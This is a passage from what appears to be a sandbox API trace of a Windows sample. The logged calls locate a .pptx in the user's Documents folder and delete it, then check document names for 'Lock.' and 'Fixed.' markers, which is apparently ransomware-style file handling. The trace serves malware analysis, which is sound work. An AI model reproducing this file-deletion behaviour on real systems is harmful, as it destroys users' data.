lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.112] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.112] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.112] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.112] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.112] FreeLibrary (hLibModule=0x76390000) returned 1 [0222.112] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.112] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.112] CloseHandle (hObject=0x4dc) returned 1 [0222.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.114] CloseHandle (hObject=0x50c) returned 1 [0222.117] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.117] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.117] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.118] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/XTyOBM6VZ0m.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx", lpFilePart=0x8cedf4*="XTyOBM6VZ0m.pptx") returned 0x2a [0222.118] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\xtyobm6vz0m.pptx")) returned 0x20 [0222.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7918cd20, ftCreationTime.dwHighDateTime=0x1d58899, ftLastAccessTime.dwLowDateTime=0x8958970, ftLastAccessTime.dwHighDateTime=0x1d558cf, ftLastWriteTime.dwLowDateTime=0x8958970, ftLastWriteTime.dwHighDateTime=0x1d558cf, nFileSizeHigh=0x0, nFileSizeLow=0xf74c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="XTyOBM6VZ0m.pptx", cAlternateFileName="XTYOBM~1.PPT")) returned 0x9e1db8 [0222.118] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\xtyobm6vz0m.pptx")) returned 1 [0222.120] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7918cd20, ftCreationTime.dwHighDateTime=0x1d58899, ftLastAccessTime.dwLowDateTime=0x8958970, ftLastAccessTime.dwHighDateTime=0x1d558cf, ftLastWriteTime.dwLowDateTime=0x8958970, ftLastWriteTime.dwHighDateTime=0x1d558cf, nFileSizeHigh=0x0, nFileSizeLow=0xf74c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="XTyOBM6VZ0m.pptx", cAlternateFileName="XTYOBM~1.PPT")) returned 0 [0222.120] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0222.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d58 | out: hHeap=0x2af0000) returned 1 [0222.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.121] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.121] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.121] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0222.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854ec0 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0222.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0222.123] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/XTyOBM6VZ0m.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx", lpFilePart=0x8cf650*="XTyOBM6VZ0m.pptx") returned 0x2a [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0222.123] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\XTyOBM6VZ0m.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\xtyobm6vz0m.pptx")) returned 0xffffffff [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854ec0 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.123] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0222.123] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.123] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0222.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0222.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YBBoLDeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBoLDeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BoLDeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLDeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LDeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DeAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eAtb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Atb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tb.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0222.125] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0222.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0222.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YBBoLDeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBoLDeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BoLDeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLDeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LDeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DeAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eAtb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Atb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tb.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0222.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69790 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0222.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0222.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.126] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0222.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0222.127] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0222.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0222.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0222.127] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0222.127] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 